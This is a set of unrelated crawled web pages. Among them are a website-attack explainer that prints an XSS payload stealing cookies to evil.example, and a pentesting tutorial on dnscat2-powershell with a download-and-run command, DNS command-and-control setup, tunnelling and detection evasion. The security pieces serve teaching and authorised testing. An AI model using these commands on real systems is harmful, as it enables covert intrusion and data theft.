There are two types of XSS attacks: stored XSS attacks and reflected XSS attacks. In stored attacks, the infected script is permanently kept on the server, and the attacker can trigger it anytime. In reflected attacks, the scripts are bounced off web servers in the form of warnings or search results. Since this makes the request look authentic, the website processes it and the victim’s browser ends up executing the script.
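On the defensive side, one common safeguard is to escape untrusted input before it is rendered back into a page. A minimal Python sketch (the web framework and surrounding plumbing are omitted, and the payload below is just an illustration):

import html

user_comment = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

# Escaping converts the markup into harmless text before it is echoed into the page
safe_comment = html.escape(user_comment)
print(safe_comment)  # the &lt;script&gt; text is displayed to users, not executed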
6. Exploiting plugin vulnerabilities
If you use WordPress then you must be familiar with plugins (extensions & modules in case of Magento & Drupal respectively). Plugins are considered as the most vulnerable parts of a website. Any outdated or unsecured third-party plugins can be exploited by attackers to take control of your website or bring it down altogether. The best way to stay safe is to always use plugins from trusted sources and always keep your plugins updated
7. Brute force
In this hacking technique, the attackers try multiple combinations of the password until one of the combinations matches. This method is simple to execute but requires huge computing power. The longer the password, the tougher it is to guess using brute force. Sometimes attackers also use dictionaries to speed up the process.
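A quick back-of-the-envelope calculation shows why password length matters so much here. This is only a rough sketch; the guess rate is an arbitrary assumption:

# Rough brute-force cost estimate: keyspace = charset_size ** length
charset = 26 + 26 + 10 + 32          # lower-case, upper-case, digits, common symbols
guesses_per_second = 1e10            # assumed attacker capability (hypothetical)

for length in (6, 8, 10, 12):
    keyspace = charset ** length
    years = keyspace / guesses_per_second / 31_557_600  # seconds in a year
    print(f"{length}-character password: ~{years:.2e} years to exhaust the keyspace")

Each extra pair of characters multiplies the attacker's work by thousands, which is why long passphrases resist brute force far better than short complex passwords.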
8. DNS Spoofing
By using DNS spoofing attacks, attackers can force victims to land on a fake website. This is done by changing the IP addresses stored in the DNS server to an address that leads to the attacker’s website. DNS cache poisoning is the process by which the local DNS server’s cached records are replaced with forged entries pointing to the attacker’s server. Once the victim lands on the fake website, the attacker can infect the victim’s system with malware and use other website hacking techniques to cause further damage.
9. Cookie theft
As harmless as it sounds, this attack can effectively steal all your important data. During browsing sessions, websites store tons of cookies on your computer. These cookies contain a lot of sensitive information, including your login credentials such as your passwords or even your payment data. If the attackers get their hands on these cookies, they can either steal all this information or use it to impersonate you online.
The above attacks are generally used against some vulnerability which the attackers exploit. That is why it is crucial to keep updating your software & other systems.
Once a vulnerability is discovered it is necessary to patch it up before an attacker exploits it to cause harm. Ethical hackers and security researchers around the globe try to discover such security gaps to ensure they are fixed. Astra’s VAPT (Vulnerability Assessment & Penetration Testing) does exactly that.
Moreover, you can look up known vulnerabilities in the system/software you are using by following this website: cve.mitre.org
Steps to protect yourself from getting hacked
Now we know the various ways attackers can harm you or your website. This will help us in understanding how attackers work and thus enable us to take more effective steps to protect ourselves from such attackers. Below are some basic steps to protect your data from some common website hacking techniques:
- Use strong passwords and 2-factor authentications wherever possible
- Keep your plugins and software updated with the latest security patches
- Use strong firewalls to prevent DDoS attacks and block unwanted IP addresses
- Maintaining proper code sanitization and using parameterized queries can help stop SQL injection attacks (see the sketch after this list)
- Avoid clicking on any unknown links or opening attachments in email from unknown sources
- Regular security audits to keep track of your website’s security
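For the code sanitization point above, the key habit is to pass user input as bound parameters rather than concatenating it into SQL. Here is a minimal sketch using Python's built-in sqlite3 module; the table, column and file names are hypothetical:

import sqlite3

conn = sqlite3.connect("example.db")
conn.execute("CREATE TABLE IF NOT EXISTS users (name TEXT, email TEXT)")

user_input = "alice' OR '1'='1"   # a classic injection attempt

# Unsafe alternative: f"SELECT * FROM users WHERE name = '{user_input}'" would match every row.
# With a bound parameter, the input is treated as a literal value, so the injection fails.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)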
Websites are always vulnerable to such attacks and one needs to be vigilant round the clock. To monitor your website’s security, Astra’s security firewall is the best option for you.
With their constant monitoring of your website and an intuitive dashboard, you will always be aware of any attempts to sabotage your website.
If you liked this post, go ahead and share this with your friends 🙂 | <urn:uuid:f7916c3d-c5ed-4def-8302-b20625f14d7c> | CC-MAIN-2022-40 | https://www.getastra.com/blog/knowledge-base/website-hacking-techniques/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00402.warc.gz | en | 0.932056 | 1,610 | 2.515625 | 3 |
Use our Voice API to create a unique phone system. You can now dynamically control, make, receive, or conference calls from your web server.
A simple mechanism to send alerts, notifications, reminders, updates and more through text messages on your office phones.
What is an API?
API stands for Application Programming Interface: a set of programming instructions and standards for accessing web-based software. In other words, this is how web-based applications talk to one another. An API is also referred to as “middleware”; with APIs it is possible to develop applications and services independently of the underlying device they will run on.
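In practice, an application talks to a web API by sending HTTP requests and reading back structured responses. The sketch below uses the third-party Python requests library against a purely hypothetical endpoint and credentials, for illustration only – consult the provider's API reference for the real URL and fields:

import requests

# Hypothetical REST endpoint and credentials - replace with values from the provider's documentation
response = requests.post(
    "https://api.example-telecom.com/v1/calls",
    auth=("ACCOUNT_ID", "API_TOKEN"),
    json={"from": "+15551230100", "to": "+15551230101", "answer_url": "https://example.com/gather.xml"},
)
print(response.status_code, response.json())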
API’s for business Telecommunications
Since API is an interface that facilitates the communication between two applications, in VoIP telecommunication world this communication happens by sending the calls over internet. These calls are managed through web services. Web services is a standardized way of integrating web applications using XML. | <urn:uuid:15af3a54-46b0-407f-a468-f7bc1ade85df> | CC-MAIN-2022-40 | https://www.didforsale.com/api-docs | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00402.warc.gz | en | 0.906543 | 204 | 3.125 | 3 |
Schools and bandwidth… Where does your school rank?
Where does your school rank among your neighbors in Internet bandwidth? A new website offers a way to compare yourself with the district leaders, and see how much they are spending on their bandwidth.
Education Super Highway is a nonprofit organization helping public schools get access to better Internet. It recently launched a website that shows Internet pricing for more than 13,500 U.S. school districts.
The Federal Communications Commission (FCC) has declared that school districts must provide a certain number of Kbps (kilobits per second) per student. That amount is currently 100 Kbps per student.
Using this website, school districts will be able to measure how much bandwidth each student receives and how they compare to other school districts. This will serve as an incentive and a leverage point for schools to receive more bandwidth for what they are paying.
Currently, 23 percent of all public school districts in the U.S. do not meet the FCC’s minimum for bandwidth per student. The report shows how states nationwide are faring in this race to meet the FCC’s minimum while at the same time demonstrating that they put their students first.
In New York, the nation’s largest public school district, New York Public Schools, was compared with other urban districts in the state, like Elmira City School District. The study found that New York Public Schools was 78 Kbps short of the 100 Kbps target, coming to 22 Kbps per student, while Elmira City School District provides 666 Kbps per student.
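The arithmetic behind the per-student figure is straightforward; here is a quick sketch with made-up district numbers (only the 100 Kbps threshold comes from the FCC figure above):

# Hypothetical district: check contracted bandwidth against the FCC's 100 Kbps-per-student minimum
students = 12_000
contracted_mbps = 900

kbps_per_student = contracted_mbps * 1_000 / students
status = "meets" if kbps_per_student >= 100 else "falls below"
print(f"{kbps_per_student:.0f} Kbps per student ({status} the FCC minimum of 100 Kbps)")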
Need to roll out mobile devices on campus? D&D can help – Contact us at 800-453-4195, or by clicking here. | <urn:uuid:21476d52-45a2-4dd3-b084-8c6db1f4b40e> | CC-MAIN-2022-40 | https://ddsecurity.com/2016/03/31/school-districts-public-internet-access-students/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00402.warc.gz | en | 0.959133 | 356 | 2.578125 | 3 |
Will the cure be worse than the disease? No-one knows
It will be months, if not years, before we can assess whether the lockdown in response to Covid-19 will have caused more suffering and death than direct infection. Analyses of available data have led to an estimate that it doubles the risk of death within a year for all age groups, adjusted by co-morbidity etc. That implies a death rate in London, for example, of about double that now estimated for the Great Smog of 1952.
What we do “know” for certain is that almost nothing we have been told or might predict is based on robust evidence. The two opening paragraphs of the Chatham House guide to responses around the world indicate succinctly how and why this is so: “confusion, chaos and denial … [while] the window of opportunity to respond closes rapidly … political manoeuvring … lack of co-ordination, ambivalence towards response structures and tensions in key relationships …” We have seen them all. They are compounded by the pressure on journalists to keep ahead of social media in covering the latest “news”, real or rumour. Meanwhile politicians and governments have to be seen to be “in charge” and “ahead of the game”, whether or not they believe the advice they are being given.
Decisions that would normally take months or years have to made within days on the balance of guesstimated probabilities masquerading as “science”. These have ranged from dramatic lock downs and emergency powers based on extrapolating the Wuhan model to the decision by the US Food and Drug Administration to agree the use of obsolete and now rarely used (because of known side effects) anti-malarial drugs in “a wide scale human experiment”, in New York City. According to the Washington Post Political Newsletter a decision which would normally have taken at least nine months of studies and testing was agreed inside three days.
Public and political will are likely to change before we have “reliable” data
The success of the lockdown and the speed with which 750,000 have volunteered to help the NHS response indicate that current UK policy really does have the broad public support indicated by opinion polls, but how long will that last?
The latest YouGov data indicates that support is shallow (“fairly” rather than “very”), particularly among the young. While 68% of the over 65s are very or fairly scared of contracting Covid-19, the same is true of only 43% of those aged 18 – 24. This lack of fear is reflected in their contrasting views of how well the Government has handled the crisis. 32% of the over 65s think the Government has handled the crisis very well compared to only 10% of 18 – 24 year olds.
If the Prime Minister and Health Secretary work through a mild infection we can expect a reaction against the “scientific” advice which has caused the UK to follow most of the world into almost total lockdown while Singapore and Sweden have resisted the pressures to do so. This will almost certainly lead to the lockdown being relaxed before it collapses. Those of my generation (where a doubling of the risk of dying within the year makes a significant difference) may hope that such a relaxation will be selective, as in Wuhan, and tied to the gathering pace of testing. Those aged under 24 might, however, force the pace, while leaving us “kettled” for much longer.
If the Prime Minister and the Health Service team are seriously incapacitated, the experts will be able to say “we told you so” and support for the current scale of lockdown will last longer, leading to an even more painful recovery.
What is the likely end game?
Among the many articles, websites and social media groups covering national and local guidance and volunteering initiatives, we are beginning to see some speculating about the nature of the end game in both the US and the UK. The comments in response to such articles indicate that the current consensus in support of lockdown, denial of civil liberties and enforced totalitarian collectivism is temporary and fragile.
Some respondents appear to expect recovery policies akin to those after the total mobilisation of World War 2 (including state planning and rationing).
Others, seeing the cleaner city air resulting from falls in traffic, look forward to expediting Green agendas.
Those who have lost jobs, savings and businesses appear split between those who expect Government to help them and tell them what to do and those who have lost faith in Government and want to be free to help themselves and their families to recover.
We can also see concerns that the closure of schools and youth and sports clubs will lead to a dangerous period in our inner cities as bored teenagers face a long hot summer with little to do.
Businesses in lockdown need to not only survive but also plan for recovery.
The McKinsey paper “A blueprint for remote working: lessons from China” provides succinct board level guidance (and many links) for those whose organisations may have to survive weeks or months of partial or total lock down and then compete with those who have emerged before them.
- It is difficult to work from home while the children are also learning from home.
- Productivity tails off unless the organisation has plans and strategies for maintaining it.
Five of the eight “lessons from China” echo messages in the quality policy, project management, estimating, documentation, testing and other manuals that underpinned F I’s reputation for better meeting clients’ needs for delivering robust software to time and budget than most of its conventional competitors. The new “lessons” are to do with harnessing and securing the networking technologies we have today to support home-based workers. In short, organisations need to organise and support remote workers properly and also use the opportunity to provide them with the structures and skills the organisation will need for the recovery.
The process of adapting to survive has begun
Yesterday I updated my blog on the guidance and content available for those switching from classroom to home learning as schools, colleges and classroom/residential training centres are closed. It now includes links covering guidance regarding on-line support for apprenticeships and examples (Blue Screen IT and Digital Skills UK ) of how those providing industry recognised courses and qualification are responding.
I have also begun receiving e-mails from pubs, restaurants and their suppliers who are now doing home deliveries to their customers and offering to help organise on-line social activities for the organisations whose events they used to host.
Parliament has, reluctantly, gone on-line
One of the final actions by Parliament before it went into lockdown was to agree the use of remote conferencing for its Select Committees, discounting the advice of those who, like the MOD, regarded applications like Zoom as insecure, despite their use by the Prime Minister to host Cabinet meetings. Presumably the Ministers involved did not use Macs, the source of the security flaw publicised by Zoom’s competitors.
So too have the political parties
The Conservative Policy Forum, relaunched last year as the main in-house policy formation arm of the Conservative Party, responded to the cancellation of the Conservative Spring Forum by moving its competition for policy ideas on-line. It has also gone on-line for its policy discussion on responses to the Covid emergency. The briefing for this includes a clear and succinct summary of what Government has done before asking what more is needed. The questions range from asking for suggestions of local responses that could or should be copied elsewhere, through gaps in provision that need to be addressed, to how we bring lockdown to a successful conclusion and recover afterwards. There is also the question of how we hope society will change as a result.
Nothing will be the same again.
We will need new thinking, as opposed to the re-shoeing of old hobbyhorses.
As yet the pundits are merely updating their past nostrums. I am no better. I am due to present one of the motions for the CPF policy competition. It is an extension to the off-line world of the case for partnership policing of the on-line world on which I blogged just before Christmas . Handling the recovery from Covid-19 into a changed new world will make such action, including the on-line training of volunteers, even more urgent but we also need to take a good look at the governance structures – local as well as national and international.
One of the other entries in the CPF policy competition is to merge Income Tax and National Insurance. This has been overdue since the link between contributions and benefits atrophied and died. The problems with organising benefits for the surge in unemployment, including among those previously self employed, makes it timely to also use HMRC identities, as well as records, to handle Universal Credit.
That raises the need, as I raised in my most recent blog, to take a new look at data sharing across the public sector, not just to allow mobile phone apps to be used to help enable those who are not infectious to be released from lock down to help the recovery. But that is not the only area where a bonfire of regulation may be needed to help the recovery.
The small print of the response of BEREC (the college of European communications regulators) contains a call to preserve “Net Neutrality” in the face of pressures to prioritise emergency traffic, now that the Internet is the critical infrastructure, alongside power, that is keeping society going. As yet the Internet has coped remarkably well, in part because players like Netflix have voluntarily tuned down resolution, but is “neutrality” between content and types of traffic really appropriate for a core part of the global, not just national, critical infrastructure?
There is much to think about while we are in lockdown if we want to live in a relatively free, safe and democratically accountable society afterwards, for however long it takes us to rebuild prosperity. | <urn:uuid:122e89b5-98c6-4571-ac1f-033da8083be7> | CC-MAIN-2022-40 | https://www.computerweekly.com/blog/When-IT-Meets-Politics/Tomorrow-began-last-week-Preparing-for-a-Post-Covid-Lockdown-World | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00402.warc.gz | en | 0.960819 | 2,079 | 2.578125 | 3 |
What is Flow Monitoring?
Network monitoring is key to optimizing network and application performance. Part of this strategy involves keeping track of what is going on in your network, which requires a detailed understanding of various data about network traffic. Flow monitoring helps your team accomplish this task and capture all communication going to and from a network device. To understand the importance of flow monitoring, it may be useful to know what a flow is in IT terms.
What is Network Flow?
When devices on a network need to communicate, they establish communication channels. A flow can be thought of as the communication between two such endpoints on the network. A network flow contains information about the series of communications between the endpoints while communication occurs. Some of the data in a flow includes the IP protocol, type of service entries, and IP address information.
Monitoring this current of information enables IT teams to gather greater insights on their network.
What is Flow Monitoring?
The first network flow technology was developed by Cisco back in 1996. Flow monitoring is a method that measures the movement of data between two devices or applications on a network. This method aims to give IT teams information about the traffic that crosses their network as well as how the network is performing on a daily basis.
Network flow shows who is sending data, how they are sending data, and when they are sending data. More recently developed network flow technologies also have expanded capabilities, such as full packet capture and deep packet inspection, both of which give additional insight into network and application performance. IT teams are able to access flow data from a variety of sources, including routers, firewalls, and switches. This information is powerful for network optimization and troubleshooting.
How Does Flow Monitoring Work?
Network information is first collected by a flow exporter as it enters or exits a network interface. The information is then sent to a collector, which processes and stores the data. The collector can be either a piece of hardware or a piece of software. Most commonly, the collector is a piece of software. Finally, an analysis is performed to create visuals and helpful statistics. IT teams then have access to actionable insights around network performance.
Why Do I Need Flow Monitoring?
If your network experiences high volume, older network monitoring techniques usually do not cut it. Your team needs access to the right data at the right time. Flow data provides more information as compared to other network monitoring techniques, such as SNMP-based polling. Flow monitoring is an effective way for IT teams to troubleshoot network issues and keep networks up and running. IT teams recognize network flow analysis as the standard for flow-based network traffic analysis.
Flow Monitoring Benefits
Organizations enjoy a number of advantages when implementing flow monitoring technology. Here are just a few benefits you will enjoy:
Optimize Your Network Bandwidth Usage
Organizations often make incorrect assumptions around their bandwidth usage. Luckily, flow monitoring allows you to monitor bandwidth usage in real-time in order to identify users and devices who are consuming bandwidth. Other monitoring techniques are known to provide incorrect readings that falsely indicate that you need more bandwidth—when in reality only a few users are responsible for most of the bandwidth usage. Flow monitoring ensures that you fully understand how your bandwidth is being used. IT teams can identify users who are consuming more bandwidth than average and take action to correct those issues.
Another bandwidth issue to consider is that you also need to be sure that your network will be able to handle future traffic volumes. IT teams can use historical network flow data to plan for future bandwidth upgrades.
Flow monitoring is a powerful tool when verifying or troubleshooting the performance of certain applications or parts of the IT infrastructure. IT teams use network flow information to take any necessary corrective action. Additionally, flow monitoring technology easily integrates with other network monitoring solutions to get an overview of troubleshooting alerts. IT teams receive alerts when issues arise—such DNS misuse or problems with TLS—all in one place.
Monitoring traffic for hackers and malicious devices is a routine part of a network administrator’s day. Flow monitoring detects traffic that is already inside of the network, as opposed to detecting traffic at the boundary of the network. This enables your team to identify potential threats that other cyber defenses have missed.
Flow monitoring identifies traffic that deviates from normal traffic behavior. Although this network monitoring technique does not give all the detailed data for cybersecurity, it gives your team a starting point for deeper analysis. Your team will be able to proactively identify DDoS attacks, anomalous network activity, and more.
Data that is collected from flow monitoring provides a grander view of what is going on in your network, and flow monitoring allows your team to see the route that data packets take through your network. Your team will be able to understand the potential effects of a new application, network topology, or an increase in traffic.
LiveAction provides clients with LiveWire, which converts packet data into rich flow for the LiveNX flow solution. Clients can easily (and quickly) isolate problem areas and rapidly respond to high-severity incidents without the need for deep forensic analysis. If you’re interested in learning more about LiveAction flow monitoring solutions, reach out to our team to schedule a demo today! | <urn:uuid:f2e58d6d-11e7-4691-83b1-754570e6d21e> | CC-MAIN-2022-40 | https://www.liveaction.com/resources/blog/what-is-flow-monitoring/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00402.warc.gz | en | 0.936314 | 1,079 | 2.96875 | 3 |
Luke Baggett //
Imagine a scenario where a Penetration Tester is trying to set up command and control on an internal network blocking all outbound traffic, except traffic towards a few specific servers the tester has no access to. In this situation, there is still a last-ditch option the tester can use, that being DNS command and control.
If you’re unfamiliar with DNS command and control, the basic idea involves a C2 client sending data inside DNS queries. These DNS queries are forwarded across the internet’s DNS hierarchy to an authoritative DNS server, where the C2 server is located. The C2 server then returns data inside the DNS response, which is forwarded back to the C2 client. DNS must be implemented to allow an internal network to communicate with the Internet in any meaningful way, therefore C2 over DNS is highly effective.
Dnscat2 by Ron Bowes is one of the best DNS tunnel tools around for infosec-related applications. DNScat2 supports encryption, authentication via pre-shared secrets, multiple simultaneous sessions, tunnels similar to those in ssh, command shells, and the most popular DNS query types (TXT, MX, CNAME, A, AAAA). The client is written in C, and the server is written in ruby.
I recently finished implementing all the features of the dnscat2 C client in a PowerShell client available here, and included a few extra PowerShell specific features. PowerShell is quite common among real-world attackers and penetration testers alike due to its numerous features, versatility, and the fact it is built in to most Windows systems. In this blog post, we’ll look at how the dnscat2-powershell script can be used.
Although dnscat2 is designed to travel over DNS servers on the Internet, it can also send DNS requests directly to a dnscat2 server, which is useful for testing. This blog post will only show examples using local connections, but you can read about how to set up an authoritative server here.
Ron Bowes gives a great tutorial on how to install the server in his README for dnscat2. Once the server is ready, you can start it like this:
sudo ruby dnscat2.rb --dns “domain=test,host=192.168.56.1” --no-cache
Using the “—no-cache” option is required for the PowerShell client to work correctly due to the fact that the nslookup command uses sequential DNS transaction ID values that are not initially randomized.
A Windows machine with PowerShell version 2.0 or later installed is required to use dnscat2-Powershell. The dnscat2 functions can be loaded by downloading the script and running the following command:
Alternatively you can paste the following command into PowerShell to enable the dnscat2-powershell functionality:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/ lukebaggett/dnscat2-powershell/master/dnscat2.ps1')
Once the functions are loaded, run the following command to start the dnscat2-powershell server:
Start-Dnscat2 -Domain test -DNSServer 192.168.56.1
Start-Dnscat2 is the name of the main function used in dnscat2-powershell that allows clients to establish a command session with the server. From the server, you can now direct the client to perform different actions. Here’s a video that shows what this looks like:
If you don’t want to use a command session, you can use the -Exec, -ExecPS, or -Console parameters for Start-Dnscat2.
Extra PowerShell-related features have been added to dnscat2-powershell command session. For example, you can simulate an interactive PowerShell session by typing the following command:
You may also pass the -ExecPS switch to Start-Dnscat2 to enable this feature. The client will take input from the server, pass it to Invoke-Expression, and return the output. Variables are preserved throughout the client’s lifespan. This allows the usage of awesome PowerShell tools such as PowerSploit.
Scripts can be loaded into memory on the client over DNS by typing the following command:
upload /tmp/script.ps1 hex:$var
The hex representation of the file will be placed into the $var variable. From there, the hex can be converted to a string and loaded as a PowerShell function. Similarly, typing the following command:
upload bytes:$var /tmp/var
will download a byte array stored in $var, and write it to /tmp/var. At the moment, these two features are new and buggy, and are more reliable with smaller scripts.
By default, all traffic is encrypted. This can be turned off by passing -NoEncryption to Start-Dnscat2, and starting the server with following command option:
Without encryption, all dnscat2 packets are simply hex encoded, making it fairly simple for people who know the dnscat2 protocol to reassemble the data.
Authentication with a pre-shared secret can be used to prevent man in the middle by passing a password to -PreSharedSecret on the client, and the –c option on the server.
Dnscat2 supports tunnels similar to SSH Local Port forwarding. The dnscat2 server listens on a local port and any connection to that port are forwarded through the DNS tunnel, and the dnscat2 client forwards the connection to a port on another host.
One scenario where this comes in handy is when the dnscat2 client is on an internal network with an SSH server. By setting up a tunnel from a port on the server to the SSH server on the internal network, you can achieve an interactive SSH session over DNS. The below video shows how this is done:
Avoiding Detection by generic signatures
There are many ways to detect DNS tunnels. Checking the query length of outbound DNS queries, monitoring the frequency of DNS queries from specific hosts, and checking for specific uncommon query types are a few examples.
A static or random delay can be added between each request the client sends by using -Delay and -MaxRandomDelay with Start-Dnscat2. The delay can be changed from a command session by typing the following command:
This can help avoid detection by systems using frequency based analysis. It’s useful for a DNS tunnel to use the maximum length of a DNS query to transfer data faster. Yet, how often is a legitimate user going to be sending maximum length DNS queries? A signature could be written based on queries using the precise maximum length of a query. If you want to be slightly more stealthy, you can shorten your maximum request size with the -MaxPacketSize parameter.
Many DNS tunnels will use TXT, CNAME, or MX queries due to the simplicity of processing their responses, and their long response length. These aren’t the most common query types, so an IDS may alert on the high frequency of these queries. A and AAAA queries are much more expected, so using them may help you slip past IDS detection. The -LookupTypes parameter for Start-Dnscat2 can be used to pass a list of valid query types to the client. The client will randomly select a query type from this list for each DNS query it sends.
Using all three of these options makes writing a good signature for dnscat2 slightly more complicated. A video below shows all of these options combined, and how modifying the options noticeably impacts data transfer speed.
Tunneling your communications through DNS has some real practical advantages. Primarily, providing a shell in environments with even the most extreme outbound traffic filtering. The major downside is the slow speeds involved with forwarding all your traffic through the internet’s DNS servers. Now with a PowerShell version of the dnscat2 client, penetration testers can easily use DNS-based C2 alongside familiar PowerShell tools.
Join the BHIS Blog Mailing List – get notified when we post new blogs, webcasts, and podcasts. | <urn:uuid:4f7adb79-f4c5-4036-b804-d799206019be> | CC-MAIN-2022-40 | https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00602.warc.gz | en | 0.884972 | 1,798 | 2.546875 | 3 |
Computers have a lot of moving parts to them. A network system can be very complicated, and unless you have the time to spend learning about everything (which most business owners do not), you really just need a system that works. However, if you do familiarize yourself with some basic functions, you can end up making smarter, more efficient decisions regarding the IT for your company.
That’s why we wanted to explain one of the most basic differences when it comes to the amount of space you have available on your system- RAM and Hard Drive.
What Do They Do?
Both of these pieces perform the same basic function- they store information and make it available to you. The difference is in the roles they play in how they store that information. To better understand the differences, it helps to explain their relationship.
The easiest way to understand the relationship between RAM and hard drive space, is to think in terms of the human brain. The hard drive is the long-term memory, and the RAM is the short-term memory. They work together to help store information as needed, and make sure it is available when you need it- whether that is ten minutes from now, or ten years.
Basically, when you want to retrieve something from your hard drive (opening a program, pulling up an old document), the RAM acts as the middle man. It will communicate with your hard drive, and pull up the information from the hard drive for you. So, whenever you open up a file of pictures or reports, you are actually looking at it off of the RAM, not the hard drive itself.
That is why, when your computer starts slowing down, one of the things an engineer will check is how much RAM you have on your computer. By getting more RAM, or replacing old RAM with newer versions, you can increase the speed of your computer.
What About CPU?
It is important to note here though, that sometimes just increasing or replacing the amount of RAM is not enough to fix your computer. In some cases, you need to look at the CPU (Central Processing Unit) to determine if the problem goes deeper, to the brains of the computer. To learn more about CPU, read this blog post 9 Phrases of IT Lingo You Should Know.
The best way to think about the relationship between CPU and RAM is like an assembly line in a factory. The RAM is the assembly line workers, the real people, and the CPU is the machinery. If production in the factory is too slow, you can add more workers on to the assembly line, and usually that will fix the problem. However, if the problem is with the machinery itself, if it is not making the product fast enough, it won’t matter how many assembly line workers you have, your productivity will never progress past a certain level.
So, if it turns out the problem is with your CPU speed, adding and/or replacing RAM is not going to help speed up the machine.
RAM is a really important part of your system. It may seem small and insignificant, but if your RAM is not working properly you will quickly feel the impact.
Now that you understand a little more about what RAM is and what role it plays on your computer, you will be able to make more informed decisions about what you need in order to keep your system, and therefore your organization, running as efficiently as possible. | <urn:uuid:48c10233-4ca3-4522-8280-9ad58f9d4e24> | CC-MAIN-2022-40 | https://www.networkdepot.com/ram-and-hard-drive-space/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00602.warc.gz | en | 0.954737 | 695 | 3.703125 | 4 |
Carbon management technologies have a huge potential to remove CO2 from the atmosphere, but policymakers must act quickly and give these technologies the visibility they need to deploy and help halt global warming, ministers and experts speaking at a forum on the topic said.
Ministers and experts spoke at the first High-Level Roundtable on Carbon Management Technologies on hosted by the International Energy Forum (IEF) in collaboration with the King Abdullah Petroleum Studies and Research Centre (KAPSARC) and the Clean Energy Ministerial Secretariat (CEM).
The roundtable examined how best to accelerate the deployment of technologies such as Carbon Capture, Utilisation and Storage (CCUS) and other circular carbon models in industry practice, and energy and climate policy in the Gulf region and across Europe, North America, and Asia-Oceania. CCUS involves a series of technologies to capture CO2 from energy flows, waste gases, or the atmosphere and inject it into geological structures for permanent storage or convert it into products such as plastics or concrete, in addition to nature-based solutions.
“CCUS is, of course, one of the solutions we in the oil industry have to combat the effects of climate change,” H.E. Shaikh Mohammed bin Khalifa Al Khalifa, Minister of Oil, Bahrain, said.
As part of its nationwide climate strategy, the United Arab Emirates has a target of five million tons of captured CO2 to be injected by 2030, equivalent to the capture capacity of five million acres of forest, said Suhail Mohamed Al Mazrouei, Minister of Energy, and Infrastructure.
CCUS projects benefit from government support to offset a variety of risk factors, such as high-upfront costs, poorly developed markets and ill-defined policy or regulatory frameworks — all of which have slowed uptake, experts said.
G20 Energy Ministers endorsed the Circular Carbon Economy Platform in September 2020. The G20 Climate and Energy Ministers Meeting in July 2021 explicitly recognised the need for investment and financing for advanced clean technologies including CCUS and carbon recycling.
“Definitely, the world is getting together on one fact,” UAE minister Al Mazrouei, said. “We need to do things faster, and we need to do more on this important subject.”
An international CCUS mechanism to broaden the scope of CCUS policies, possibly under the aegis of the IEF, would help catalyse investment and advance development, said Joseph McMonigle, Secretary General of the IEF. “The quest to achieve climate neutrality, for instance by building a vibrant hydrogen economy by 2050, depends on economy-wide uptake of CCUS and international collaboration to focus on high-impact areas,” he added. “In short, it’s time to green light CCUS.”
Adam Sieminski, senior advisor to the King Abdullah Petroleum Studies and Research Centre (KAPSARC) Board of Trustees said: “The circular carbon economy and the CCUS framework represents an integrated and holistic approach toward realizing carbon dioxide and other greenhouse gas emissions targets. Governments can and must play an important role to achieve CCUS deployment.”
That has been the strategy in Norway, said Lars Andreas Lunde, Deputy Minister for Norway’s Ministry of Petroleum and Energy. Norway has invested heavily in CCUS technology in its early phases, with two-thirds of financing and risk taken on by the government, with the full knowledge that these early stages are not profitable.
“These are complexity and expense issues,” said Mr Lunde. “In an early phase, we needed state support. Carbon capture and storage especially CCUS should be profitable on the longer end.”
The roundtable follows up on the release of a new IEF report entitled, “Strategies to Scale Carbon Capture Utilization and Storage.” CCUS capacity needs to grow from 40 million tons today to at least 5,600 million tons by 2050 to meet Paris goals of limiting global warming to 1.5 to 2.0 degrees by 2050, according to the report. CCUS has the potential to account for, at least, one-fifth of the CO2 emissions cuts required to meet that goal.
The report points to the critical role of market forces in bringing CCUS to scale and highlights the need for measures to de-risk CCUS finance and incentivize clustering in industrial parks to improve synergies across different industries. CCUS must be incorporated into large-scale industrial planning, national recovery plans, Environmental, Social and Governance standards, and Nationally Determined Contributions for countries as they plot their pathways to net zero, the report says.
“The IEF report on strategies to scale CCUS … speaks to the timeliness and versatility and the relevance of these technologies and the leverage government and industry stakeholders can seize,” said Dan Dorner, Head of CEM.
The roundtable concluded that CCUS forges a link between energy security, affordable energy access and climate change mitigation. It provides a versatile technology to reduce emissions in hard-to-abate sectors and offers investors incentives and more predictability across value chains without stranding jobs or assets, experts said.
From the US perspective, Maria DiGiulian, Acting Deputy Assistant Secretary for International Affairs at the US Department of Energy said the current administration was pumping investment into research, development, and deployment in different types of carbon capture, use and storage options.
“Whether CO2 is captured from a point source or through direct air capture technologies, secure and reliable CO2 storage is critical in helping us to meet our climate goals,” she said.
“Our focus is to expand carbon capture into the natural gas space and in hard-to-abate industrial sectors such as ethanol, hydrogen, cement, paper and steel production.”
“For the production of synthetic fuels and chemicals with CO2 as a feedstock, the sourcing of low carbon hydrogen will be critical. There is significant potential in applying carbon capture to help advance a cost-effective and low-carbon hydrogen economy,” she added.
The UK is already quite advanced in its planning for a series of CCUS projects tied to major industrial clusters, said Alex Milward, Director for CCUS at the UK’s Department for Business, Energy, and Industrial Strategy. The UK will announce the first wave of industrial clusters that will receive government support to be operational by the mid-2020s before the COP26 meeting in November, he said.
